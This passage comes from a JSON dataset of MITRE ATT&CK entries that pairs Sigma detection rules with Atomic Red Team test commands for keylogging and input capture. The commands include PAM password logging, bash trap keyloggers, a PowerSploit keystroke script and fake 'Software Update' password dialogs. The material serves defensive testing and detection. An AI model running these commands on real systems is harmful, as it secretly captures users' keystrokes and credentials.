sourcetype=\"bash_history\" ld.so.preload | table host,user_name,bash_command", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + } + ], + "possible_detections": [ + "auditlogs (audit.rules)", + "bash_history logs", + { + "title": "CobaltStrike Process Injection", + "id": "6309645e-122d-4c5b-bb2b-22e4f9c2fa42", + "description": "Detects a possible remote threat creation with certain characteristics which are typical for Cobalt Strike beacons", + "references": [ + "https://medium.com/@olafhartong/cobalt-strike-remote-threads-detection-206372d11d0f", + "https://blog.cobaltstrike.com/2018/04/09/cobalt-strike-3-11-the-snake-that-eats-its-tail/" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1055" + ], + "status": "experimental", + "author": "Olaf Hartong, Florian Roth, Aleksey Potapov, oscd.community", + "date": "2018/11/30", + "modified": "2019/11/08", + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection": { + "EventID": 8, + "TargetProcessAddress|endswith": [ + "0B80", + "0C7C", + "0C88" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "unknown" + ], + "level": "high" + }, + { + "title": "Malicious Named Pipe", + "id": "fe3ac066-98bb-432a-b1e7-a5229cb39d4a", + "status": "experimental", + "description": "Detects the creation of a named pipe used by known APT malware", + "references": [ + "Various sources" + ], + "date": "2017/11/06", + "author": "Florian Roth", + "logsource": { + "product": "windows", + "service": "sysmon", + "definition": "Note that you have to configure logging for PipeEvents in Symson config" + }, + "detection": { + "selection": { + "EventID": [ + 17, + 18 + ], + "PipeName": [ + "\\isapi_http", + "\\isapi_dg", + "\\isapi_dg2", + "\\sdlrpc", + "\\ahexec", + "\\winsession", + "\\lsassw", + "\\46a676ab7f179e511e30dd2dc41bd388", + "\\9f81f59bc58452127884ce513865ed20", + "\\e710f28d59aa529d6792ca6ff0ca1b34", + "\\rpchlp_3", + "\\NamePipe_MoreWindows", + 
"\\pcheap_reuse", + "\\msagent_*" + ] + }, + "condition": "selection" + }, + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" + ], + "falsepositives": [ + "Unkown" + ], + "level": "critical" + }, + { + "title": "Malware Shellcode in Verclsid Target Process", + "id": "b7967e22-3d7e-409b-9ed5-cdae3f9243a1", + "status": "experimental", + "description": "Detects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro", + "references": [ + "https://twitter.com/JohnLaTwC/status/837743453039534080" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" + ], + "author": "John Lambert (tech), Florian Roth (rule)", + "date": "2017/03/04", + "logsource": { + "product": "windows", + "service": "sysmon", + "definition": "Use the following config to generate the necessary Event ID 10 Process Access events: VBE7.DLLUNKNOWN" + }, + "detection": { + "selection": { + "EventID": 10, + "TargetImage": "*\\verclsid.exe", + "GrantedAccess": "0x1FFFFF" + }, + "combination1": { + "CallTrace": "*|UNKNOWN(*VBE7.DLL*" + }, + "combination2": { + "SourceImage": "*\\Microsoft Office\\\\*", + "CallTrace": "*|UNKNOWN*" + }, + "condition": "selection and 1 of combination*" + }, + "falsepositives": [ + "unknown" + ], + "level": "high" + }, + { + "title": "Exploit for CVE-2017-0261", + "id": "864403a1-36c9-40a2-a982-4c9a45f7d833", + "status": "experimental", + "description": "Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262", + "references": [ + "https://www.fireeye.com/blog/threat-research/2017/05/eps-processing-zero-days.html" + ], + "author": "Florian Roth", + "date": "2018/02/22", + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "ParentImage": 
"*\\WINWORD.EXE", + "Image": "*\\FLTLDR.exe*" + }, + "condition": "selection" + }, + "falsepositives": [ + "Several false positives identified, check for suspicious file names or locations (e.g. Temp folders)" + ], + "level": "medium" + }, + { + "title": "Exploiting SetupComplete.cmd CVE-2019-1378", + "id": "1c373b6d-76ce-4553-997d-8c1da9a6b5f5", + "status": "experimental", + "description": "Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd decribed in CVE-2019-1378", + "references": [ + "https://www.embercybersecurity.com/blog/cve-2019-1378-exploiting-an-access-control-privilege-escalation-vulnerability-in-windows-10-update-assistant-wua" + ], + "author": "Florian Roth", + "date": "2019/11/15", + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "ParentCommandLine": [ + "*\\cmd.exe /c C:\\Windows\\Setup\\Scripts\\SetupComplete.cmd", + "*\\cmd.exe /c C:\\Windows\\Setup\\Scripts\\PartnerSetupComplete.cmd" + ] + }, + "filter": { + "Image": [ + "C:\\Windows\\System32\\\\*", + "C:\\Windows\\SysWOW64\\\\*", + "C:\\Windows\\WinSxS\\\\*", + "C:\\Windows\\Setup\\\\*" + ] + }, + "condition": "selection and not filter" + }, + "falsepositives": [ + "Unknown" + ], + "level": "high" + }, + { + "title": "Dridex Process Pattern", + "id": "e6eb5a96-9e6f-4a18-9cdd-642cfda21c8e", + "status": "experimental", + "description": "Detects typical Dridex process patterns", + "references": [ + "https://app.any.run/tasks/993daa5e-112a-4ff6-8b5a-edbcec7c7ba3" + ], + "author": "Florian Roth", + "date": "2019/01/10", + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection1": { + "CommandLine": "*\\svchost.exe 
C:\\Users\\\\*\\Desktop\\\\*" + }, + "selection2": { + "ParentImage": "*\\svchost.exe*", + "CommandLine": [ + "*whoami.exe /all", + "*net.exe view" + ] + }, + "condition": "1 of them" + }, + "falsepositives": [ + "Unlikely" + ], + "level": "critical" + }, + [ + "4657", + "Windows Registry" + ], + [ + "4663", + "File monitoring" + ], + [ + "4688", + "Process Execution" + ], + [ + "DLL monitoring" + ], + [ + "Named Pipes" + ], + [ + "API monitoring" + ], + [ + "4657", + "Windows Registry" + ], + [ + "4663", + "File monitoring" + ], + [ + "4688", + "Process Execution" + ], + [ + "Sysmon ID 7", + "DLL monitoring" + ], + [ + "Sysmon ID 17", + " 18", + "Named Pipes" + ], + [ + "API monitoring" + ], + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + 
"data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process access", + "description": "A process was accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process access", + "description": "A process was accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "process" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file stream" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + } + ], + "external_reference": [ + "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/", + "https://securingtomorrow.mcafee.com/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/may/emissary-panda-a-potential-new-malicious-tool/", + "https://www.group-ib.com/blog/cobalt", + "https://github.com/rapid7/meterpreter/tree/master/source/extensions/priv/server/elevate", + "https://securelist.com/luckymouse-hits-national-data-center/86083/", + "http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf", + "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", + "https://www.welivesecurity.com/2018/05/22/turla-mosquito-shift-towards-generic-tools/", + "https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html", + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ], + [ + 
"https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1056.001", + "command_list": [ + "Set-Location $PathToAtomicsFolder\n.\\T1056.001\\src\\Get-Keystrokes.ps1 -LogPath $env:TEMP\\key.log\n", + "if sudo test -f /etc/pam.d/password-auth; then sudo cp /etc/pam.d/password-auth /tmp/password-auth.bk; fi; if sudo test -f /etc/pam.d/system-auth; then sudo cp /etc/pam.d/system-auth /tmp/system-auth.bk; fi; sudo touch /tmp/password-auth.bk sudo touch /tmp/system-auth.bk sudo echo \"session required pam_tty_audit.so enable=* log_password\" >> /etc/pam.d/password-auth sudo echo \"session required pam_tty_audit.so enable=* log_password\" >> /etc/pam.d/system-auth", + "PROMPT_COMMAND='history -a >(tee -a ~/.bash_history |logger -t \"$USER[$$] $SSH_CONNECTION \")'\necho \"\\$PROMPT_COMMAND=$PROMPT_COMMAND\"\ntail /var/log/syslog\n", + "trap 'echo \"$(date +\"%d/%m/%y %H:%M:%S.%s\") $USER $BASH_COMMAND\" >> /tmp/.keyboard.log' DEBUG\necho \"Hello World!\"\ncat /tmp/.keyboard.log\n", + "cp -v /etc/pam.d/sshd /tmp/\necho >> \"session required pam_tty_audit.so disable=* enable=* open_only log_passwd\"\nsystemctl restart sshd\nsystemctl restart auditd\nssh ubuntu@localhost \nwhoami\nsudo su\nwhoami\nexit\nexit\n", + "auditctl -a always,exit -F arch=b64 -S execve -k CMDS \nauditctl -a always,exit -F arch=b32 -S execve -k CMDS\nwhoami; ausearch -i --start $(date +\"%d/%m/%y %H:%M:%S\") \n" + ], + "commands": [ + { + "command": "Set-Location $PathToAtomicsFolder\n.\\T1056.001\\src\\Get-Keystrokes.ps1 -LogPath $env:TEMP\\key.log\n", + "source": "atomics/T1056.001/T1056.001.yaml", + "name": "Atomic Red Team Test - Input Capture: Keylogging" + }, + { + 
"command": "if sudo test -f /etc/pam.d/password-auth; then sudo cp /etc/pam.d/password-auth /tmp/password-auth.bk; fi; if sudo test -f /etc/pam.d/system-auth; then sudo cp /etc/pam.d/system-auth /tmp/system-auth.bk; fi; sudo touch /tmp/password-auth.bk sudo touch /tmp/system-auth.bk sudo echo \"session required pam_tty_audit.so enable=* log_password\" >> /etc/pam.d/password-auth sudo echo \"session required pam_tty_audit.so enable=* log_password\" >> /etc/pam.d/system-auth", + "source": "atomics/T1056.001/T1056.001.yaml", + "name": "Atomic Red Team Test - Input Capture: Keylogging" + }, + { + "command": "PROMPT_COMMAND='history -a >(tee -a ~/.bash_history |logger -t \"$USER[$$] $SSH_CONNECTION \")'\necho \"\\$PROMPT_COMMAND=$PROMPT_COMMAND\"\ntail /var/log/syslog\n", + "source": "atomics/T1056.001/T1056.001.yaml", + "name": "Atomic Red Team Test - Input Capture: Keylogging" + }, + { + "command": "trap 'echo \"$(date +\"%d/%m/%y %H:%M:%S.%s\") $USER $BASH_COMMAND\" >> /tmp/.keyboard.log' DEBUG\necho \"Hello World!\"\ncat /tmp/.keyboard.log\n", + "source": "atomics/T1056.001/T1056.001.yaml", + "name": "Atomic Red Team Test - Input Capture: Keylogging" + }, + { + "command": "cp -v /etc/pam.d/sshd /tmp/\necho >> \"session required pam_tty_audit.so disable=* enable=* open_only log_passwd\"\nsystemctl restart sshd\nsystemctl restart auditd\nssh ubuntu@localhost \nwhoami\nsudo su\nwhoami\nexit\nexit\n", + "source": "atomics/T1056.001/T1056.001.yaml", + "name": "Atomic Red Team Test - Input Capture: Keylogging" + }, + { + "command": "auditctl -a always,exit -F arch=b64 -S execve -k CMDS \nauditctl -a always,exit -F arch=b32 -S execve -k CMDS\nwhoami; ausearch -i --start $(date +\"%d/%m/%y %H:%M:%S\") \n", + "source": "atomics/T1056.001/T1056.001.yaml", + "name": "Atomic Red Team Test - Input Capture: Keylogging" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1056.001", + "display_name": "Input Capture: Keylogging", + "atomic_tests": [ + { + "name": "Input 
Capture", + "auto_generated_guid": "d9b633ca-8efb-45e6-b838-70f595c6ae26", + "description": "Utilize PowerShell and external resource to capture keystrokes\n[Payload](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/src/Get-Keystrokes.ps1)\nProvided by [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-Keystrokes.ps1)\n\nUpon successful execution, Powershell will execute `Get-Keystrokes.ps1` and output to key.log.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "filepath": { + "description": "Name of the local file, include path.", + "type": "Path", + "default": "$env:TEMP\\key.log" + } + }, + "executor": { + "command": "Set-Location $PathToAtomicsFolder\n.\\T1056.001\\src\\Get-Keystrokes.ps1 -LogPath #{filepath}\n", + "cleanup_command": "Remove-Item $env:TEMP\\key.log -ErrorAction Ignore\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Living off the land Terminal Input Capture on Linux with pam.d", + "auto_generated_guid": "9c6bdb34-a89f-4b90-acb1-5970614c711b", + "description": "Pluggable Access Module, which is present on all modern Linux systems, generally contains a library called pam_tty_audit.so which logs all keystrokes for the selected users and sends it to audit.log. All terminal activity on any new logins would then be archived and readable by an adversary with elevated privledges.\n\nPasswords hidden by the console can also be logged, with 'log_passwd' as in this example. If root logging is enabled, then output from any process which is later started by root is also logged, even if this policy is carefully enabled (e.g. 'disable=*' as the initial command).\n\nUse 'aureport --tty' or other audit.d reading tools to read the log output, which is binary. Mac OS does not currently contain the pam_tty_audit.so library. 
\n", + "dependencies": [ + { + "description": "Checking if pam_tty_audit.so is installed\n", + "prereq_command": "test -f '/usr/lib/pam/pam_tty_audit.so -o /usr/lib64/security/pam_tty_audit.so'\n", + "get_prereq_command": "echo \"Sorry, you must install module pam_tty_audit.so and recompile, for this test to work\"\n" + } + ], + "supported_platforms": [ + "linux" + ], + "executor": { + "command": "if sudo test -f /etc/pam.d/password-auth; then sudo cp /etc/pam.d/password-auth /tmp/password-auth.bk; fi; if sudo test -f /etc/pam.d/system-auth; then sudo cp /etc/pam.d/system-auth /tmp/system-auth.bk; fi; sudo touch /tmp/password-auth.bk sudo touch /tmp/system-auth.bk sudo echo \"session required pam_tty_audit.so enable=* log_password\" >> /etc/pam.d/password-auth sudo echo \"session required pam_tty_audit.so enable=* log_password\" >> /etc/pam.d/system-auth", + "cleanup_command": "sudo cp -f /tmp/password-auth.bk /etc/pam.d/password-auth\nsudo cp -f /tmp/system-auth.bk /etc/pam.d/system-auth\n", + "name": "sh", + "elevation_required": true + } + }, + { + "name": "Logging bash history to syslog", + "auto_generated_guid": "0e59d59d-3265-4d35-bebd-bf5c1ec40db5", + "description": "There are several variables that can be set to control the appearance of the bash command prompt: PS1, PS2, PS3, PS4 and PROMPT_COMMAND. The contents of these variables are executed as if they had been typed on the command line. 
The PROMPT_COMMAND variable \"if set\" will be executed before the PS1 variable and can be configured to write the latest \"bash history\" entries to the syslog.\n\nTo gain persistence the command could be added to the users .bashrc or .bash_aliases or the systems default .bashrc in /etc/skel/ \n", + "supported_platforms": [ + "linux" + ], + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "This test requires to be run in a bash shell and that logger and tee are installed.\n", + "prereq_command": "if [ \"$(echo $SHELL)\" != \"/bin/bash\" ]; then echo -e \"\\n***** Bash not running! *****\\n\"; exit 1; fi\nif [ ! -x \"$(command -v logger)\" ]; then echo -e \"\\n***** logger NOT installed *****\\n\"; exit 1; fi\nif [ ! -x \"$(command -v tee)\" ]; then echo -e \"\\n***** tee NOT installed *****\\n\"; exit 1; fi\n", + "get_prereq_command": "echo \"\"\n" + } + ], + "executor": { + "name": "sh", + "elevation_required": true, + "command": "PROMPT_COMMAND='history -a >(tee -a ~/.bash_history |logger -t \"$USER[$$] $SSH_CONNECTION \")'\necho \"\\$PROMPT_COMMAND=$PROMPT_COMMAND\"\ntail /var/log/syslog\n", + "cleanup_command": "unset PROMPT_COMMAND\n" + } + }, + { + "name": "Bash session based keylogger", + "auto_generated_guid": "7f85a946-a0ea-48aa-b6ac-8ff539278258", + "description": "When a command is executed in bash, the BASH_COMMAND variable contains that command. For example :~$ echo $BASH_COMMAND = \"echo $BASH_COMMAND\". The trap command is not a external command, but a built-in function of bash and can be used in a script to run a bash function when some event occurs. trap will detect when the BASH_COMMAND variable value changes and then pipe that value into a file, creating a bash session based keylogger. 
\n\nTo gain persistence the command could be added to the users .bashrc or .bash_aliases or the systems default .bashrc in /etc/skel/ \n", + "supported_platforms": [ + "linux" + ], + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "This test requires to be run in a bash shell\n", + "prereq_command": "if [ \"$(echo $SHELL)\" != \"/bin/bash\" ]; then echo -e \"\\n***** Bash not running! *****\\n\"; exit 1; fi\n", + "get_prereq_command": "echo \"\"\n" + } + ], + "input_arguments": { + "output_file": { + "name": "output_file", + "description": "File to store captured commands", + "type": "String", + "default": "/tmp/.keyboard.log" + } + }, + "executor": { + "name": "sh", + "elevation_required": false, + "command": "trap 'echo \"$(date +\"%d/%m/%y %H:%M:%S.%s\") $USER $BASH_COMMAND\" >> #{output_file}' DEBUG\necho \"Hello World!\"\ncat #{output_file}\n", + "cleanup_command": "rm #{output_file}\n" + } + }, + { + "name": "SSHD PAM keylogger", + "auto_generated_guid": "81d7d2ad-d644-4b6a-bea7-28ffe43becca", + "description": "Linux PAM (Pluggable Authentication Modules) is used in sshd authentication. The Linux audit tool auditd can use the pam_tty_audit module to enable auditing of TTY input and capture all keystrokes in a ssh session and place them in the /var/log/audit/audit.log file after the session closes.\n", + "supported_platforms": [ + "linux" + ], + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "This test requires sshd and auditd\n", + "prereq_command": "if [ ! -x \"$(command -v sshd)\" ]; then echo -e \"\\n***** sshd NOT installed *****\\n\"; exit 1; fi\nif [ ! 
-x \"$(command -v auditd)\" ]; then echo -e \"\\n***** auditd NOT installed *****\\n\"; exit 1; fi\n", + "get_prereq_command": "echo \"\"\n" + } + ], + "input_arguments": { + "user_account": { + "description": "Basic ssh user account for testing.", + "type": "String", + "default": "ubuntu" + } + }, + "executor": { + "name": "sh", + "elevation_required": true, + "command": "cp -v /etc/pam.d/sshd /tmp/\necho >> \"session required pam_tty_audit.so disable=* enable=* open_only log_passwd\"\nsystemctl restart sshd\nsystemctl restart auditd\nssh #{user_account}@localhost \nwhoami\nsudo su\nwhoami\nexit\nexit\n", + "cleanup_command": "cp -fv /tmp/sshd /etc/pam.d/\n" + } + }, + { + "name": "Auditd keylogger", + "auto_generated_guid": "a668edb9-334e-48eb-8c2e-5413a40867af", + "description": "The linux audit tool auditd can be used to capture 32 and 64 bit command execution and place the command in the /var/log/audit/audit.log audit log. \n", + "supported_platforms": [ + "linux" + ], + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "This test requires sshd and auditd\n", + "prereq_command": "if [ ! 
-x \"$(command -v auditd)\" ]; then echo -e \"\\n***** auditd NOT installed *****\\n\"; exit 1; fi\n", + "get_prereq_command": "echo \"\"\n" + } + ], + "executor": { + "name": "sh", + "elevation_required": true, + "command": "auditctl -a always,exit -F arch=b64 -S execve -k CMDS \nauditctl -a always,exit -F arch=b32 -S execve -k CMDS\nwhoami; ausearch -i --start $(date +\"%d/%m/%y %H:%M:%S\") \n", + "cleanup_command": "systemctl restart auditd\n" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system 
components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "driver", + "definition": "Information associated with device drivers, or computer programs that operate or control a particular type of device that is attached to a computer.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Linux", + "macOS", + "Windows" + ], + "data_component": "driver load", + "description": "A driver (User-mode, kernel-mode) was loaded.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "driver" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + 
"https://developer.apple.com/library/archive/documentation/DeviceDrivers/Conceptual/IOKitFundamentals/Features/Features.html", + "https://docs.microsoft.com/en-us/windows-hardware/drivers/gettingstarted/user-mode-and-kernel-mode" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1056.002", + "command_list": [ + "osascript -e 'tell app \"System Preferences\" to activate' -e 'tell app \"System Preferences\" to activate' -e 'tell app \"System Preferences\" to display dialog \"Software Update requires that you type your password to apply changes.\" & return & return default answer \"\" with icon 1 with hidden answer with title \"Software Update\"'\n", + "# Creates GUI to prompt for password. Expect long pause before prompt is available. \n$cred = $host.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName)\n# Using write-warning to allow message to show on console as echo and other similar commands are not visable from the Invoke-AtomicTest framework.\nwrite-warning $cred.GetNetworkCredential().Password\n" + ], + "commands": [ + { + "command": "osascript -e 'tell app \"System Preferences\" to activate' -e 'tell app \"System Preferences\" to activate' -e 'tell app \"System Preferences\" to display dialog \"Software Update requires that you type your password to apply changes.\" & return & return default answer \"\" with icon 1 with hidden answer with title \"Software Update\"'\n", + "source": "atomics/T1056.002/T1056.002.yaml", + "name": "Atomic Red Team Test - Input Capture: GUI Input Capture" + }, + { + "command": "# Creates GUI to prompt for password. Expect long pause before prompt is available. 
\n$cred = $host.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName)\n# Using write-warning to allow message to show on console as echo and other similar commands are not visable from the Invoke-AtomicTest framework.\nwrite-warning $cred.GetNetworkCredential().Password\n", + "source": "atomics/T1056.002/T1056.002.yaml", + "name": "Atomic Red Team Test - Input Capture: GUI Input Capture" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1056.002", + "display_name": "Input Capture: GUI Input Capture", + "atomic_tests": [ + { + "name": "AppleScript - Prompt User for Password", + "auto_generated_guid": "76628574-0bc1-4646-8fe2-8f4427b47d15", + "description": "Prompt User for Password (Local Phishing)\nReference: http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html\n", + "supported_platforms": [ + "macos" + ], + "executor": { + "command": "osascript -e 'tell app \"System Preferences\" to activate' -e 'tell app \"System Preferences\" to activate' -e 'tell app \"System Preferences\" to display dialog \"Software Update requires that you type your password to apply changes.\" & return & return default answer \"\" with icon 1 with hidden answer with title \"Software Update\"'\n", + "name": "bash" + } + }, + { + "name": "PowerShell - Prompt User for Password", + "auto_generated_guid": "2b162bfd-0928-4d4c-9ec3-4d9f88374b52", + "description": "Prompt User for Password (Local Phishing) as seen in Stitch RAT. Upon execution, a window will appear for the user to enter their credentials.\n\nReference: https://github.com/nathanlopez/Stitch/blob/master/PyLib/askpass.py\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "# Creates GUI to prompt for password. Expect long pause before prompt is available. 
\n$cred = $host.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName)\n# Using write-warning to allow message to show on console as echo and other similar commands are not visable from the Invoke-AtomicTest framework.\nwrite-warning $cred.GetNetworkCredential().Password\n", + "name": "powershell" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1056.004", + "command_list": [ + "mavinject $pid /INJECTRUNNING 
